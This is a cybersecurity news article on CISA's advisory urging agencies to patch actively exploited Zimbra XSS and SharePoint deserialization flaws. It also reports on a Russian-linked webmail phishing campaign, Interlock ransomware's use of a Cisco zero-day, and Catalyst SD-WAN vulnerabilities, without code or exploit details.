CISA Urges Immediate Patching of Critical Zimbra and SharePoint Vulnerabilities Amid Active Exploitation
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent advisory for government agencies to patch two significant vulnerabilities affecting the Synacor Zimbra Collaboration Suite (ZCS) and Microsoft Office SharePoint. These vulnerabilities have been confirmed to be actively exploited in the wild, raising alarms about potential data breaches and unauthorized access.
Overview of the Vulnerabilities
The vulnerabilities identified are:
-
CVE-2025-66376 (CVSS score: 7.2): This stored cross-site scripting vulnerability exists in the Classic UI of ZCS. Attackers can exploit Cascading Style Sheets (CSS) @import directives embedded in HTML email messages. This flaw was addressed in versions 10.0.18 and 10.1.13 released in November 2025.
-
CVE-2026-20963 (CVSS score: 8.8): This vulnerability involves the deserialization of untrusted data in Microsoft Office SharePoint, allowing unauthorized attackers to execute code over a network. A fix was implemented in January 2026.
CISA’s warning emphasizes the critical need for timely patching, especially for Federal Civilian Executive Branch (FCEB) agencies, which are advised to implement fixes for CVE-2025-66376 by April 1, 2026, and for CVE-2026-20963 by March 23, 2026.
Context of Exploitation
The addition of CVE-2025-66376 to CISA’s Known Exploited Vulnerabilities (KEV) catalog follows a report from Seqrite Labs. This report detailed a campaign, dubbed Operation GhostMail, allegedly orchestrated by a Russian state-sponsored group targeting the State Hydrographic Service of Ukraine. The operation employs social engineering tactics to deliver an obfuscated JavaScript payload through email.
Seqrite Labs noted that the phishing email does not contain malicious attachments or suspicious links. Instead, the entire attack chain is embedded within the HTML body of the email, exploiting the Zimbra webmail session to execute the attack.
The JavaScript malware is designed to harvest sensitive information, including credentials, session tokens, backup two-factor authentication (2FA) recovery codes, and browser-saved passwords. The data is exfiltrated over both DNS and HTTPS protocols. The email associated with this campaign was sent on January 22, 2026, from a compromised account linked to the National Academy of Internal Affairs.
Implications for Cybersecurity
The tactics employed in Operation GhostMail reflect a troubling evolution in cyber intrusion methods. By relying on browser-resident stealers rather than traditional malware binaries, attackers can achieve full session interception without triggering endpoint-based detections. This shift underscores the need for organizations to bolster their defenses against such sophisticated phishing attacks.
The campaign aligns with previous operations by Russian state-sponsored threat actors, such as Operation RoundPress, which similarly exploited XSS vulnerabilities in webmail systems to breach Ukrainian organizations.
Currently, there are no public reports detailing the exploitation of CVE-2026-20963 or the identity of the threat actors behind it. However, the ongoing active exploitation of both vulnerabilities necessitates immediate action from affected organizations.
Broader Threat Landscape
The urgency of CISA’s advisory coincides with revelations from Amazon regarding the Interlock ransomware group. This group has exploited a critical security flaw in Cisco’s firewall management software (CVE-2026-20131, CVSS score: 10.0) since January 26, 2026, well before the vulnerability was publicly disclosed.
Interlock has historically targeted sectors where operational disruption can exert maximum pressure for ransom payments, including education, healthcare, and government entities. The exploitation of CVE-2026-20131 as a zero-day vulnerability illustrates the lengths to which attackers will go to identify and exploit previously unknown flaws.
CISA’s Ongoing Efforts
On March 19, 2026, CISA added CVE-2026-20131 to its KEV catalog, mandating that FCEB agencies update their systems by March 22, 2026. Additionally, CISA issued an emergency directive urging these agencies to mitigate vulnerabilities in Cisco Catalyst SD-WAN systems, which have also come under active exploitation.
A recent report from VulnCheck highlighted another vulnerability in Catalyst SD-WAN (CVE-2026-20133), indicating that it poses a higher risk than previously recognized. This flaw allows attackers to extract sensitive data, including private keys, and could lead to escalated privileges within the network.
The evolving threat landscape necessitates that organizations remain vigilant and proactive in their cybersecurity measures. As vulnerabilities are discovered and exploited, timely patching and robust security protocols become paramount.
For further insights into the ongoing cybersecurity developments, threat intelligence, and breaking updates from across the Middle East, visit Middle East.
